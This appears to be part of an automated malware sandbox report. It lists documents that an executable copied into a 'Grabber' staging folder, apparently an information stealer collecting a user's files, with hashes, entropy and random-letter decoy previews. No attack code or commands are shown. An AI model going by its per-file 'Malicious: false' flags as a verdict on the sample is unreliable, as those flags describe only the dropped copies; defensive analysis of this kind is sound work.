Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\JDDHMPCDUJ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV\DUUDTUBZFW.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV\EEGWXUHVUG.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQE